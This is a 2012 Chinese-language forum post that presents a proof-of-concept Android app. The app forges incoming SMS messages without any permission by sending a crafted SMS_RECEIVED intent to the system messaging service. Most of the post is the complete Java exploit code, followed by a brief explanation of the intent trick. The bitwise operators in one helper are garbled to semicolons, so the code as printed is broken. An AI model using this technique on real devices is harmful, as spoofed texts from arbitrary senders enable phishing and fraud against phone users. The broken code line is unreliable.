管理员
|
阅读:2909回复:0
android无权限伪造短信
楼主#
更多
发布于:2012-11-12 13:17
 | |  |  | 0x01
这个有是大名鼎鼎的蒋教授发现的,原理简单,有点意思 0x02 代码实现 java代码 package com.smstrick; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.lang.reflect.Method; import java.util.Calendar; import java.util.GregorianCalendar; import android.app.Activity; import android.content.Context; import android.content.Intent; import android.os.Bundle; import android.telephony.PhoneNumberUtils; import android.util.Log; import android.view.View; import android.view.View.OnClickListener; import android.widget.EditText; public class SMSTrickActivity extends Activity implements OnClickListener{ /** Called when the activity is first created. */ @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); View continue_button = this.findViewById(R.id.button1); continue_button.setOnClickListener((OnClickListener) this); } public void onClick(View v) { EditText eNum; EditText eMsg; String sNum; String sMsg; eNum = (EditText)findViewById(R.id.editText1); eMsg = (EditText)findViewById(R.id.editText2); sNum = eNum.getText().toString(); sMsg = eMsg.getText().toString(); //sNum cannot be blank if(sNum.equals("")) sNum = "123456"; createFakeSms(this.getApplicationContext(),sNum,sMsg); } private static void createFakeSms(Context context, String sender, String body) { //Source: http://stackoverflow.com/a/12338541 //Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app byte[] pdu = null; byte[] scBytes = PhoneNumberUtils .networkPortionToCalledPartyBCD("0000000000"); byte[] senderBytes = PhoneNumberUtils .networkPortionToCalledPartyBCD(sender); int lsmcs = scBytes.length; byte[] dateBytes = new byte[7]; Calendar calendar = new GregorianCalendar(); dateBytes[0] = reverseByte((byte) (calendar.get(Calendar.YEAR))); dateBytes[1] = reverseByte((byte) (calendar.get(Calendar.MONTH) + 1)); dateBytes[2] = reverseByte((byte) (calendar.get(Calendar.DAY_OF_MONTH))); dateBytes[3] = reverseByte((byte) (calendar.get(Calendar.HOUR_OF_DAY))); dateBytes[4] = reverseByte((byte) (calendar.get(Calendar.MINUTE))); dateBytes[5] = reverseByte((byte) (calendar.get(Calendar.SECOND))); dateBytes[6] = reverseByte((byte) ((calendar.get(Calendar.ZONE_OFFSET) + calendar .get(Calendar.DST_OFFSET)) / (60 * 1000 * 15))); try { Log.d("ice", "test one"); ByteArrayOutputStream bo = new ByteArrayOutputStream(); bo.write(lsmcs); bo.write(scBytes); bo.write(0x04); bo.write((byte) sender.length()); bo.write(senderBytes); bo.write(0x00); bo.write(0x00); // encoding: 0 for default 7bit bo.write(dateBytes); try { String sReflectedClassName = "com.android.internal.telephony.GsmAlphabet"; Class cReflectedNFCExtras = Class.forName(sReflectedClassName); Method stringToGsm7BitPacked = cReflectedNFCExtras.getMethod( "stringToGsm7BitPacked", new Class[] { String.class }); stringToGsm7BitPacked.setAccessible(true); byte[] bodybytes = (byte[]) stringToGsm7BitPacked.invoke(null, body); bo.write(bodybytes); } catch (Exception e) { e.printStackTrace(); } pdu = bo.toByteArray(); } catch (IOException e) { e.printStackTrace(); } Intent intent = new Intent(); intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiverService"); intent.setAction("android.provider.Telephony.SMS_RECEIVED"); intent.putExtra("pdus", new Object[] { pdu }); //intent.putExtra("format", "3gpp"); context.startService(intent); } private static byte reverseByte(byte b) { return (byte) ((b ; 0xF0) >> 4 | (b ; 0x0F) << 4); } } 0x03 实质分析 核心在于自定义了系统的 Intent intent = new Intent(); intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiverService"); intent.setAction("android.provider.Telephony.SMS_RECEIVED"); intent.putExtra("pdus", new Object[] { pdu }); //intent.putExtra("format", "3gpp"); context.startService(intent); 收到短信的intent,从而伪造了短信,而且不需要任何的权限。
| |  | |  |
|
